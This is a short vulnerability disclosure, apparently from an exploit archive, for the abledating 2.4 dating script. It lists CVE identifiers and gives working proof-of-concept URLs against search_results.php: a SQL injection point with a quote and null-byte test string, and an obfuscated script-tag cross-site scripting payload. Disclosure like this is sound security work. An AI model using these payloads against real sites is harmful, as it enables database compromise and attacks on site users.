Bug: abledating 2.4 Sql injection and cross site scripting on search_results.php (WLB-2008050001 Ascii Version)

English Version
WLB2

CVE WLB2

 Topic: abledating 2.4 Sql injection and cross site scripting on search_results.php
 Credit: a.jasbi
 Date: 2008.05.25
 CWE: CWE-79 (Show similar)
 CVE: CVE-2008-6439 (Show details)
CVE-2008-6572 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
Low
No
Yes

By : Ali Jasbi ( hackerz.ir security & hacking team)
vendor : abk-soft.com
product name : abledating 2.4
Exploits :
1- Sql injection :
bug :
http://abledating//search_results.php?p_age_from=18&p_age_to=18&keyword=[sql
injection]&status=online&save_search=on&search_name=My%20search&photo=on&p_orientation%255B%255D=2&a
mp;order=rating&sort=desc&p_relation%255B%255D=4&search
test :
http://abledating/search_results.php?p_age_from=18&p_age_to=18&keyword=%00'&status=online&save_search=on
&search_name=My%20search&photo=on&p_orientation%255B%255D=2&order=rating&sort=desc&p_relation%25
5B%255D=4&search
2-Cross site scripting :
bug :
http://abledating/search_results.php?p_orientation%5B%5D=2&p_age_from=18&p_age_to=18&p_relation%5B%5D=on&
;keyword=>'><ScRiPt%20%0a%0d>alert(42119.7535489005)%3B</ScRiPt>&status=online&save_search=on&
amp;search_name=My%20search&photo=on

[ ASCII VERSION ]

Copyright 2012, cxsecurity.com